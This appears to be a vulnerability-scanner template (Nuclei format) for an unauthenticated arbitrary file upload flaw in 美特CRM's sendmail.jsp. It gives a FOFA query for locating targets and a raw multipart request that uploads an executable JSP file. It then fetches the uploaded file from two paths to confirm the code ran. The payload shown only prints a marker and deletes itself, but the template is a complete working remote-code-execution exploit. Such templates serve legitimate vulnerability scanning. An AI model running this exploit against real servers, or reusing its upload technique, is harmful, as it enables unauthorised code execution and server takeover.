id: meiteCRM-sendmail_jsp-File-upload

info:
  name: 美特CRM sendmail.jsp 任意文件上传漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="/common/scripts/basic.js"
    美特CRM sendmail.jsp 接口存在任意文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
  reference:
    - https://mp.weixin.qq.com/s/zzVML-pKM5_WtGCvqxW_OQ
  tags: File upload

variables:
  username: "{{to_lower(rand_base(6))}}" #从可选字符集（默认为字母和数字）生成给定长度字符串的随机序列

http:
  - raw:
      - |
        POST /business/ums/sendmail.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj

        ------WebKitFormBoundaryFfJZ4PlAZBixjELj
        Content-Disposition: form-data; name="file"; filename="{{username}}.jsp"
        Content-Type: image/jpeg

        <% out.println("pboyjnnrfipmplsukdeczudsefxmywe"); new java.io.File(application.getRealPath(request.getServletPath())).delete(); %>
        ------WebKitFormBoundaryFfJZ4PlAZBixjELj--
    extractors:
       - type: regex 
         part: body
         name: uploadfile
         group: 1
         regex:
           - '([a-zA-Z0-9]{32,40}.jsp)'
         internal: true
  - raw:
      - |
        GET /userfile/messageserv/{{uploadfile}} HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /userfile/default/messageserv/{{uploadfile}} HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'pboyjnnrfipmplsukdeczudsefxmywe'
      - type: status
        status: 
          - 200